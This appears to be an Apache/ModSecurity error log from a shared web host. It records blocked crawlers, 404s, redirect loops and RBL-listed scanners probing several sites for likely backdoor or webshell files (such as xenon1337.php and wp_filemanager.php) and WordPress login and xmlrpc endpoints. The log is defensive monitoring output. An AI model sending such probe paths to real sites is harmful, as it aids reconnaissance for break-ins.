[Tue May 26 15:17:20.622906 2026] [security2:error] [pid 700087:tid 700283] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsKJPHQM4as9fEIIaQnAAAAEI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 15:17:21.046990 2026] [security2:error] [pid 700087:tid 700335] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsKJPHQM4as9fEIIaQnwAAAHY"]
[Tue May 26 15:17:21.057450 2026] [security2:error] [pid 700087:tid 700323] [client 216.244.66.241:42794] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/intermercurialebff/abefeb2677893.shtml"] [unique_id "ahVsKZPHQM4as9fEIIaQqQAAAGo"]
[Tue May 26 15:17:21.057565 2026] [security2:error] [pid 700087:tid 700323] [client 216.244.66.241:42794] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/intermercurialebff/abefeb2677893.shtml"] [unique_id "ahVsKZPHQM4as9fEIIaQqQAAAGo"]
[Tue May 26 15:17:23.266152 2026] [security2:error] [pid 700087:tid 700325] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsKpPHQM4as9fEIIaQ9QAAAGw"]
[Tue May 26 15:17:26.013970 2026] [security2:error] [pid 700087:tid 700278] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsLZPHQM4as9fEIIaRWQAAAD0"]
[Tue May 26 15:17:27.450075 2026] [security2:error] [pid 700087:tid 700266] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsL5PHQM4as9fEIIaRjQAAADE"]
[Tue May 26 15:17:27.788204 2026] [security2:error] [pid 700087:tid 700339] [client 104.28.71.84:46985] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVsL5PHQM4as9fEIIaRnwAAeig"]
[Tue May 26 15:17:28.603654 2026] [security2:error] [pid 700087:tid 700257] [client 104.28.71.84:46985] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVsMJPHQM4as9fEIIaRvAAAKEI"]
[Tue May 26 15:17:28.826169 2026] [security2:error] [pid 700087:tid 700324] [client 47.128.35.206:41268] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahVsMJPHQM4as9fEIIaRygAAAGs"]
[Tue May 26 15:17:29.196618 2026] [core:error] [pid 700087:tid 700230] [client 2.58.56.61:52929] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 15:17:29.196650 2026] [core:error] [pid 700087:tid 700230] [client 2.58.56.61:52929] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 15:17:29.238559 2026] [security2:error] [pid 700087:tid 700318] [client 2.58.56.61:52928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVsMZPHQM4as9fEIIaR3gAAAGU"], referer: www.google.com
[Tue May 26 15:17:29.238921 2026] [security2:error] [pid 700087:tid 700285] [client 2.58.56.61:52927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-plain.php"] [unique_id "ahVsMZPHQM4as9fEIIaR3wAAAEQ"], referer: www.google.com
[Tue May 26 15:17:29.252392 2026] [security2:error] [pid 700087:tid 700236] [client 2.58.56.61:52926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVsMZPHQM4as9fEIIaR3QAAABM"]
[Tue May 26 15:17:29.396913 2026] [security2:error] [pid 700087:tid 700243] [client 103.92.212.20:56865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.212.92.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/xmlrpc.php"] [unique_id "ahVsMZPHQM4as9fEIIaR2wAAABo"]
[Tue May 26 15:17:29.397080 2026] [security2:error] [pid 700087:tid 700243] [client 103.92.212.20:56865] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/xmlrpc.php"] [unique_id "ahVsMZPHQM4as9fEIIaR2wAAABo"]
[Tue May 26 15:17:29.409668 2026] [security2:error] [pid 700087:tid 700288] [client 2.58.56.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahVsMZPHQM4as9fEIIaR4QAAAEc"]
[Tue May 26 15:17:29.492017 2026] [core:error] [pid 700087:tid 700296] [client 2.58.56.61:53008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 15:17:29.492045 2026] [core:error] [pid 700087:tid 700296] [client 2.58.56.61:53008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 15:17:29.539913 2026] [security2:error] [pid 700087:tid 700244] [client 2.58.56.61:53021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/qkrwuyps.php"] [unique_id "ahVsMZPHQM4as9fEIIaR7gAAABs"], referer: www.google.com
[Tue May 26 15:17:29.675943 2026] [security2:error] [pid 700087:tid 700327] [client 2.58.56.61:53015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVsMZPHQM4as9fEIIaR8gAAAG4"], referer: www.google.com
[Tue May 26 15:17:29.993169 2026] [security2:error] [pid 700087:tid 700314] [client 2.58.56.61:53088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-plain.php"] [unique_id "ahVsMZPHQM4as9fEIIaSAAAAAGE"], referer: www.google.com
[Tue May 26 15:17:30.218494 2026] [security2:error] [pid 700087:tid 700277] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsMZPHQM4as9fEIIaR-wAAADw"]
[Tue May 26 15:17:30.426065 2026] [security2:error] [pid 700087:tid 700280] [client 2.58.56.61:53177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/yycscjuc.php"] [unique_id "ahVsMpPHQM4as9fEIIaSDgAAAD8"], referer: www.google.com
[Tue May 26 15:17:30.558783 2026] [security2:error] [pid 700087:tid 700230] [client 2.58.56.61:53050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVsMpPHQM4as9fEIIaSFQAAAA0"]
[Tue May 26 15:17:30.998411 2026] [security2:error] [pid 700087:tid 700271] [client 2.58.56.61:53418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVsMpPHQM4as9fEIIaSGgAAADY"]
[Tue May 26 15:17:31.438386 2026] [security2:error] [pid 700087:tid 700274] [client 2.58.56.61:53530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVsM5PHQM4as9fEIIaSKwAAADk"]
[Tue May 26 15:17:31.877811 2026] [security2:error] [pid 700087:tid 700221] [client 2.58.56.61:53626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVsM5PHQM4as9fEIIaSNgAAAAQ"]
[Tue May 26 15:17:32.433464 2026] [security2:error] [pid 700087:tid 700259] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsM5PHQM4as9fEIIaSPQAAACo"]
[Tue May 26 15:17:32.464593 2026] [security2:error] [pid 700087:tid 700280] [client 20.12.194.227:38927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVsNJPHQM4as9fEIIaSTgAAAD8"]
[Tue May 26 15:17:32.464714 2026] [security2:error] [pid 700087:tid 700280] [client 20.12.194.227:38927] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVsNJPHQM4as9fEIIaSTgAAAD8"]
[Tue May 26 15:17:33.141584 2026] [security2:error] [pid 700087:tid 700306] [client 20.12.194.227:35310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/x.php"] [unique_id "ahVsNZPHQM4as9fEIIaSZQAAAFk"]
[Tue May 26 15:17:33.141683 2026] [security2:error] [pid 700087:tid 700306] [client 20.12.194.227:35310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/x.php"] [unique_id "ahVsNZPHQM4as9fEIIaSZQAAAFk"]
[Tue May 26 15:17:33.528075 2026] [security2:error] [pid 700087:tid 700255] [client 27.61.42.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsNZPHQM4as9fEIIaSYQAAACY"]
[Tue May 26 15:17:34.286994 2026] [security2:error] [pid 700087:tid 700310] [client 20.12.194.227:53755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/201.php"] [unique_id "ahVsNpPHQM4as9fEIIaSiwAAAF0"]
[Tue May 26 15:17:34.287131 2026] [security2:error] [pid 700087:tid 700310] [client 20.12.194.227:53755] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/201.php"] [unique_id "ahVsNpPHQM4as9fEIIaSiwAAAF0"]
[Tue May 26 15:17:34.863165 2026] [security2:error] [pid 700087:tid 700300] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsNpPHQM4as9fEIIaSlQAAAFM"]
[Tue May 26 15:17:35.755329 2026] [security2:error] [pid 700087:tid 700311] [client 20.12.194.227:53698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/ops.php"] [unique_id "ahVsN5PHQM4as9fEIIaSwgAAAF4"]
[Tue May 26 15:17:35.755452 2026] [security2:error] [pid 700087:tid 700311] [client 20.12.194.227:53698] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/ops.php"] [unique_id "ahVsN5PHQM4as9fEIIaSwgAAAF4"]
[Tue May 26 15:17:36.493445 2026] [security2:error] [pid 700087:tid 700242] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsOJPHQM4as9fEIIaSyQAAABk"]
[Tue May 26 15:17:36.519677 2026] [autoindex:error] [pid 700087:tid 700267] [client 93.159.230.85:29699] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:36.847554 2026] [security2:error] [pid 700087:tid 700252] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsOJPHQM4as9fEIIaS4AAAACM"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1203509&moderation-hash=30ff998383af377c781773c90331cda3
[Tue May 26 15:17:37.179650 2026] [autoindex:error] [pid 700087:tid 700236] [client 93.159.230.84:56664] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:37.858610 2026] [security2:error] [pid 700087:tid 700174] [remote 123.30.233.13:57234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVsOZPHQM4as9fEIIaS_wAATFY"]
[Tue May 26 15:17:38.143476 2026] [autoindex:error] [pid 700087:tid 700318] [client 93.159.230.28:42970] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:38.267054 2026] [security2:error] [pid 700087:tid 700267] [client 20.12.194.227:35309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/samll.php"] [unique_id "ahVsOpPHQM4as9fEIIaTEQAAADI"]
[Tue May 26 15:17:38.267157 2026] [security2:error] [pid 700087:tid 700267] [client 20.12.194.227:35309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/samll.php"] [unique_id "ahVsOpPHQM4as9fEIIaTEQAAADI"]
[Tue May 26 15:17:38.753589 2026] [security2:error] [pid 700087:tid 700338] [client 20.12.194.227:56830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/ingfo.php"] [unique_id "ahVsOpPHQM4as9fEIIaTIgAAAHk"]
[Tue May 26 15:17:38.753689 2026] [security2:error] [pid 700087:tid 700338] [client 20.12.194.227:56830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/ingfo.php"] [unique_id "ahVsOpPHQM4as9fEIIaTIgAAAHk"]
[Tue May 26 15:17:38.951545 2026] [security2:error] [pid 700087:tid 700231] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsOpPHQM4as9fEIIaTGgAAAA4"]
[Tue May 26 15:17:39.060689 2026] [autoindex:error] [pid 700087:tid 700225] [client 93.159.230.28:37412] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:39.813909 2026] [security2:error] [pid 700087:tid 700226] [client 85.208.96.193:18236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVsO5PHQM4as9fEIIaTSQAAAAk"]
[Tue May 26 15:17:39.814035 2026] [security2:error] [pid 700087:tid 700226] [client 85.208.96.193:18236] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVsO5PHQM4as9fEIIaTSQAAAAk"]
[Tue May 26 15:17:40.095102 2026] [security2:error] [pid 700087:tid 700300] [client 20.12.194.227:35266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/c55cdler.php"] [unique_id "ahVsPJPHQM4as9fEIIaTUQAAAFM"]
[Tue May 26 15:17:40.095231 2026] [security2:error] [pid 700087:tid 700300] [client 20.12.194.227:35266] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/c55cdler.php"] [unique_id "ahVsPJPHQM4as9fEIIaTUQAAAFM"]
[Tue May 26 15:17:40.649545 2026] [security2:error] [pid 700087:tid 700256] [client 20.12.194.227:65418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/error_log.php"] [unique_id "ahVsPJPHQM4as9fEIIaTYwAAACc"]
[Tue May 26 15:17:40.649669 2026] [security2:error] [pid 700087:tid 700256] [client 20.12.194.227:65418] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/error_log.php"] [unique_id "ahVsPJPHQM4as9fEIIaTYwAAACc"]
[Tue May 26 15:17:40.783919 2026] [security2:error] [pid 700087:tid 700307] [client 104.23.217.117:12133] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-admin/install.php"] [unique_id "ahVsPJPHQM4as9fEIIaTYgAAAFo"]
[Tue May 26 15:17:41.149733 2026] [security2:error] [pid 700087:tid 700264] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsPJPHQM4as9fEIIaTagAAAC8"]
[Tue May 26 15:17:42.177640 2026] [security2:error] [pid 700087:tid 700263] [client 20.12.194.227:56824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/xenon1337.php"] [unique_id "ahVsPpPHQM4as9fEIIaToAAAAC4"]
[Tue May 26 15:17:42.177752 2026] [security2:error] [pid 700087:tid 700263] [client 20.12.194.227:56824] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/xenon1337.php"] [unique_id "ahVsPpPHQM4as9fEIIaToAAAAC4"]
